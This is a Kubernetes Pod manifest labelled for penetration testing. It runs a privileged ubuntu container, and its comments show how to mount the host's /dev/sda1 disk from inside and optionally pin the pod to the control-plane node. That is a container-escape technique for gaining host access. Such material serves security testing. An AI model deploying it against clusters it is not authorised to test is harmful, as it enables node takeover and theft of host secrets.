apiVersion: v1
kind: Pod
metadata:
  name: priv-exec-pod
  labels:
    app: pentest
spec:
  containers:
  - name: priv-pod
    image: ubuntu
    securityContext:
      privileged: true
      # capabilities:
      #   drop:
      #     - all
      #   add: ["MKNOD"]
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  
  # apt update && apt install libcap2-bin -y
  # capsh --print

  # exec into and do
  # mkdir /host
  # mount /dev/sda1 /host/
  #nodeName: k8s-control-plane-node
